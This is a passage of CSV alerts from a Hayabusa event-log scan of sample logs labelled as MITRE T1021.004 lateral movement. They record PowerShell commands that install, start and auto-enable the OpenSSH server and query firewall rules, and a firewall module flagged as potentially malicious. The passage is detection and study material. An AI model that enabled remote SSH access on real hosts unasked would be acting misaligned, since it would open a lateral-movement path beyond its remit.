value=""Remove-AppxProvisionedPackage""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server install.evtx +2021-04-22 19:02:14.622 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-Alias): ""Set-Alias"" ParameterBinding(Set-Alias): name=""Name""; value=""Get-AppProvisionedPackage"" ParameterBinding(Set-Alias): name=""Value""; 
value=""Get-AppxProvisionedPackage""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server install.evtx +2021-04-22 19:02:14.622 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-Alias): ""Set-Alias"" ParameterBinding(Set-Alias): name=""Name""; value=""Optimize-AppProvisionedPackages"" ParameterBinding(Set-Alias): name=""Value""; value=""Optimize-AppxProvisionedPackages""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server install.evtx +2021-04-22 19:02:14.623 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-Alias): ""Set-Alias"" ParameterBinding(Set-Alias): name=""Name""; value=""Set-AppPackageProvisionedDataFile"" ParameterBinding(Set-Alias): name=""Value""; value=""Set-AppXProvisionedDataFile""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server install.evtx +2021-04-22 19:02:14.623 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-Alias): ""Set-Alias"" ParameterBinding(Set-Alias): name=""Name""; value=""Add-ProvisionedAppPackage"" ParameterBinding(Set-Alias): name=""Value""; value=""Add-AppxProvisionedPackage""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server install.evtx +2021-04-22 19:02:14.623 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline 
Execution,"CommandInvocation(Set-Alias): ""Set-Alias"" ParameterBinding(Set-Alias): name=""Name""; value=""Remove-ProvisionedAppPackage"" ParameterBinding(Set-Alias): name=""Value""; value=""Remove-AppxProvisionedPackage""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server install.evtx +2021-04-22 19:02:14.624 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-Alias): ""Set-Alias"" ParameterBinding(Set-Alias): name=""Name""; value=""Get-ProvisionedAppPackage"" ParameterBinding(Set-Alias): name=""Value""; value=""Get-AppxProvisionedPackage""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server install.evtx +2021-04-22 19:02:14.624 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-Alias): ""Set-Alias"" ParameterBinding(Set-Alias): name=""Name""; value=""Optimize-ProvisionedAppPackages"" ParameterBinding(Set-Alias): name=""Value""; value=""Optimize-AppxProvisionedPackages""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server install.evtx +2021-04-22 19:02:14.624 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-Alias): ""Set-Alias"" ParameterBinding(Set-Alias): name=""Name""; value=""Set-ProvisionedAppPackageDataFile"" ParameterBinding(Set-Alias): name=""Value""; 
value=""Set-AppXProvisionedDataFile""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server install.evtx +2021-04-22 19:02:14.627 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""*"" ParameterBinding(Export-ModuleMember): name=""Cmdlet""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server install.evtx +2021-04-22 19:04:16.455 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Add-WindowsCapability): ""Add-WindowsCapability"" ParameterBinding(Add-WindowsCapability): name=""Online""; value=""True"" ParameterBinding(Add-WindowsCapability): name=""Name""; value=""OpenSSH.Server~~~~0.0.1.0""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server install.evtx +2021-04-22 19:04:16.455 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Out-Default): ""Out-Default"" ParameterBinding(Out-Default): name=""InputObject""; value=""Microsoft.Dism.Commands.ImageObject""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server install.evtx +2021-04-22 19:04:16.478 +09:00,win10-02.offsec.lan,4104,info,,PwSh 
Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server install.evtx +2021-04-22 19:04:16.480 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server install.evtx +2021-04-22 19:04:37.081 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,Write-Host 'Final result: 1';,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server install.evtx +2021-04-22 19:04:37.663 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Host): ""Write-Host"" ParameterBinding(Write-Host): name=""Object""; value=""Final result: 1""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server install.evtx +2021-04-22 19:04:37.663 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Out-Default): ""Out-Default""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server install.evtx +2021-04-22 19:04:37.671 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock 
Log,$global:?,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server install.evtx +2021-04-22 19:19:29.476 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(PSConsoleHostReadLine): ""PSConsoleHostReadLine""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:29.479 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,Start-Service sshd,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:30.035 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Start-Service): ""Start-Service"" ParameterBinding(Start-Service): name=""Name""; value=""sshd""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:30.036 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Out-Default): ""Out-Default""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:30.039 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock 
Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:30.041 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:32.548 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(PSConsoleHostReadLine): ""PSConsoleHostReadLine""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:32.559 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,Set-Service -Name sshd -StartupType 'Automatic',../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:32.590 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-Service): ""Set-Service"" ParameterBinding(Set-Service): name=""Name""; value=""sshd"" ParameterBinding(Set-Service): name=""StartupType""; value=""Automatic""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote 
Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:32.590 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Out-Default): ""Out-Default""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:32.593 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:32.595 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:36.172 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(PSConsoleHostReadLine): ""PSConsoleHostReadLine""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:36.183 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,Get-NetFirewallRule -Name *ssh*,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote 
Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:37.904 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetFirewallRule' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function New-NetFirewallRule { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] param( [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PolicyStore}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${GPOSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('ID')] [string] ${Name}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [string] ${DisplayName}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Description}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Group}, [Parameter(ParameterSetName='cim:CreateInstance0')] 
[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled] ${Enabled}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile] ${Profile}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${Platform}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction] ${Direction}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action] ${Action}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal] ${EdgeTraversalPolicy}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('LSM')] [bool] ${LooseSourceMapping}, [Parameter(ParameterSetName='cim:CreateInstance0')] [bool] ${LocalOnlyMapping}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Owner}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${LocalAddress}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${RemoteAddress}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Protocol}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${LocalPort}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${RemotePort}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${IcmpType}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('DynamicTransport')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DynamicTransport] ${DynamicTarget}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Program}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Package}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Service}, [Parameter(ParameterSetName='cim:CreateInstance0')] [WildcardPattern[]] ${InterfaceAlias}, [Parameter(ParameterSetName='cim:CreateInstance0')] 
[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType] ${InterfaceType}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${LocalUser}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${RemoteUser}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${RemoteMachine}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Authentication] ${Authentication}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Encryption] ${Encryption}, [Parameter(ParameterSetName='cim:CreateInstance0')] [bool] ${OverrideBlockRules}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = 
[System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Name')) { [object]$__cmdletization_value = ${Name} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InstanceID'; 
ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DisplayName')) { [object]$__cmdletization_value = ${DisplayName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:37.904 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetFirewallRule' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, 
$myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function New-NetFirewallRule { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] param( [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PolicyStore}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${GPOSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('ID')] [string] ${Name}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [string] ${DisplayName}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Description}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Group}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled] ${Enabled}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile] ${Profile}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${Platform}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction] ${Direction}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action] ${Action}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal] ${EdgeTraversalPolicy}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('LSM')] [bool] 
${LooseSourceMapping}, [Parameter(ParameterSetName='cim:CreateInstance0')] [bool] ${LocalOnlyMapping}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Owner}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${LocalAddress}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${RemoteAddress}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Protocol}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${LocalPort}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${RemotePort}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${IcmpType}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('DynamicTransport')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DynamicTransport] ${DynamicTarget}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Program}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Package}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Service}, [Parameter(ParameterSetName='cim:CreateInstance0')] [WildcardPattern[]] ${InterfaceAlias}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType] ${InterfaceType}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${LocalUser}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${RemoteUser}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${RemoteMachine}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Authentication] ${Authentication}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Encryption] ${Encryption}, [Parameter(ParameterSetName='cim:CreateInstance0')] [bool] ${OverrideBlockRules}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] 
${CimSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = 